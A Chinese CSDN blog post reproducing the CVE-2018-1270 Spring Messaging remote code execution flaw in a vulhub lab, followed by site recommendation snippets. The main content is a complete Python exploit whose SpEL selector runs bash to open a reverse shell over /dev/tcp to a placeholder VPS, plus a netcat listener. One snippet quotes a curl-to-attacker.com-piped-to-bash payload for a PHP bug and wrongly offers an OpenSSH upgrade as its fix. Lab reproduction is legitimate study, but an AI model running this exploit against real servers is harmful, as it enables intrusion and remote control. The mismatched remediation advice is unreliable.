CVE-2018-1270-Spring Messaging RCE漏洞复现

最新推荐文章于 2024-04-10 02:36:47 发布
最新推荐文章于 2024-04-10 02:36:47 发布
阅读量5.7k 收藏 6
点赞数 1
分类专栏: 漏洞 文章标签: 安全 web安全 Spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58596609/article/details/124346158
版权

0x00 前言

--学如逆水行舟,不进则退

0x01 漏洞简介

Spring框架中通过spring-messaging模块来实现STOMP(Simple Text-Orientated Messaging Protocol),STOMP是一种封装WebSocket的简单消息协议。攻击者可以通过建立WebSocket连接并发送一条消息造成远程代码执行。如果使用了Spring Security项目中的权限认证,可以在一定程度上增加漏洞利用难度。

漏洞解析:

CVE-2018-1270:spring-messaging远程代码执行漏洞分析预警 - 360CERT

0x02 影响版本

影响版本

  1. Spring Framework 5.0 to 5.0.4.
  2. Spring Framework 4.3 to 4.3.14
  3. 已不支持的旧版本仍然受影响

    修复版本

  4. 5.0.x 用户升级到5.0.5版本
  5. 4.3.x 用户升级到4.3.15版本

0x03 漏洞复现

环境的话这里使用vulhub靶场,靶场的话需要使用到vulhub和docker,不会的话可以上网找一找

进入到vulhub中指定漏洞环境目录下,运行如下命令启动环境

docker-compose up -d

启动之后,出现以下页面,说明搭建成功

 

 搭建成功之后,直接使用exp,进行反弹shell

nc监听端口(端口根据自己情况定)

nc -lvvp 1122

 EXP: 记得要把红色部分改为自己的

#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)


def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))


class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time() * 1000)

    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)

    def send(self, command, headers, body=''):
        data = [command.upper(), '\n']

        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))

        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])

        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")

    def __del__(self):
        self.session.close()


sockjs = SockJS('http://靶场ip:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)

sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/vps的ip/vps端口;cat <&5 | while read line; do $line 2>&5 >&5; done"})',
    'id': 'sub-0',
    'destination': '/topic/greetings'
})

data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)

运行exp,发现反弹shell成功,如下图:

 0x04 漏洞修复

官方已经发布新版本修复了该漏洞,受影响的用户可升级至最新版本来防护该漏洞

 

种树人1
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
复现CVE-2018-1270——Spring Messaging 远程命令执行漏洞
记录并分享学习安全的知识点..
01-17 748
一、漏洞概述 spring messagingspring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用StandardEvaluationContext解析,造成命令执行漏洞。 二、漏洞复现 发现页面如下: exp如下: x.x.x.x/gs-guide-websocket 我是用dnslog验证的: 用我的方法poc如..
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
mole_exp的博客
02-26 8126
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
Spring Messaging 远程命令执行漏洞CVE-2018-1270
EC_Carrot的博客
08-04 574
漏洞简介 Pivotal Spring Framework是美国Pivotal Software公司的一套开源的Java、Java EE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Pivotal Spring Framework 5.0.5之前的5.0版本、4.3.15之前的4.3版本和不再支持的老版本中存在安全漏洞。远程攻击者可通过构造消息利用该漏洞执行任意代码。 漏洞复现 我使用的是vulhub的环境,环境内自带exploit.py,该poc需要修改参数且不具有通用性,当然在vulhub的环境
log4j2 RCE漏洞复现,2024年最新高级网络安全程序员必会
最新发布
e846815793的博客
04-10 347
下载log4j2镜像:(我们选择vulfocus/log4j2-rce-2021-12-09进行验证)启动log4j2镜像:浏览器登录:点击?????
vulhub复现spring-messaging远程代码执行漏洞CVE-2018-1270)复现
m0_70483044的博客
07-15 1526
spring-messaging模块为集成messaging api和消息协议提供支持。spring框架中通过spring-messaging模块实现STOMP(Simple Text-Orientated Messaging Protocal)-面向消息的简单文本协议.STOMP是一种封装WebSocket连接并发一条消息造成远程代码执行。STOMP为浏览器和服务器之间的通信增加适当的消息语义。创建好环境我们看一下页面为啥有了http协议还需要webscket协议咧...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT输出利用rtf -i IP,--ip IP表示netcat -p PORT ,--port netcat的PORT端口 例如: python CVE-2018-8174.py -u -o exp.rtf -i 2.2.2.2 -p 4444 将exploit.html放在您的服务器上(1.1.1.1) netcat收听[any] 4444(2.2.2.2) 好好享受 !
RCE漏洞复现
qq_43757105的博客
09-14 905
目录 漏洞描述 漏洞等级 影响版本 准备阶段 RCE漏洞复现具体步骤: Win2008搭建好环境且ip 地址为192.168.132.132​​ Win7可以访问到在win2008 phpstudy 上提前搭建的网站​​ Win7打开bp,设置好代理访问win2008​​ send to repeater​​​​ 在请求行加一行Accept-Charset: 并且还要把“deflated”面的空格删除(不删除无法执行命令) 准备执行命令system('whoami');
Redis-RCE漏洞复现
Seizerz的博客
11-19 1739
一、简介 Redis:REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis RCE漏洞来源:https://lorexxar.cn/201...
Spring Messaging 远程命令执行漏洞 CVE-2018-1270 漏洞复现
ADummy的博客
03-02 994
Spring Messaging 远程命令执行漏洞CVE-2018-1270) by ADummy 0x00利用路线 ​ 订阅的时候插入SpEL表达式—>向此订阅发送消息—>触发命令执行 0x01漏洞介绍 ​ STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它是一种在客户端与中转服务端(消息代理Broker)之间进行异步消息传输的简单通用协议,它定义了服务端与客户端之间的格式化文本传输方式。已经在被许多消息中间
记一次曲折的CVE-2018-1270复现分析
蚁景网安学院
04-02 2631
前两天接到朋友对某个授权目标的漏扫结果,也算是初次接触到这个漏洞,就想着顺手分析一下复现一下,因为分析这个漏洞的文章也比较少,所以刚开始比较迷,进度也比较慢。
Tomcat RCE 漏洞复现CVE-2019-0232)
热门推荐
大哥一声吼
04-18 1万+
漏洞影响范围,直接看官方公告: 总结起来漏洞影响范围如下: tomcat 7.0.04之前 tomcat 8.5.40之前 tomcat 9.0.19之前 版本都会影响 (tomcat 服务器版本在受影响范围内的小伙伴可以打一波补丁了) 测试环境 tomcat 版本8.5.31 jdk版本8.121 漏洞利用前提 修改conf里面的内容 第一处:con...
CVE-2018-18778.docx
07-23
CVE-2018-18778 ,mini_httpd任意文件读取漏洞
CVE-2018-3191利用exp
01-08
打包的weblogic-CVE-2018-3191 exp配合ysoserial获取shell权限
Arbitrary_upload_CVE-2018-2894_
09-29
CVE-2018-2894&2017-3506_weblogic
CVE-2018-8120-exp.zip_C++_CVE-2018-8120_cve_漏洞利用
09-23
CVE-2018-8120-完整利用代码(适用于win7-win10任意系统)
CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999
09-20
[Tool] show DVR Credentiales 通过CVE-2018-9995漏洞获取部分暴露于网络的监控设备权限,与Shodan配合食用更佳。
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
PHP 输入验证漏洞 CVE-2018-10547复现
10-24
PHP 输入验证漏洞 CVE-2018-10547是一种远程代码执行漏洞,攻击者可以通过构造恶意IMAP服务器名称来注入任意OS命令语义,从而执行任意代码。以下是复现漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -oProxyCommand”参数,例如:`127.0.0.1 -oProxyCommand="curl http://attacker.com/malicious.sh|bash"` 2. 在PHP中使用imap_open()函数连接IMAP服务器,将恶意IMAP服务器名称作为参数传入。 3. 当PHP解析恶意IMAP服务器名称时,会执行其中的恶意代码,从而导致远程代码执行漏洞。 为了防止该漏洞的攻击,建议升级openssh到OpenSSH8.4及以上版本,并确保openssl和zlib也已经升级到最新版本。此外,还应该对输入进行严格的验证和过滤,避免恶意输入的注入。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值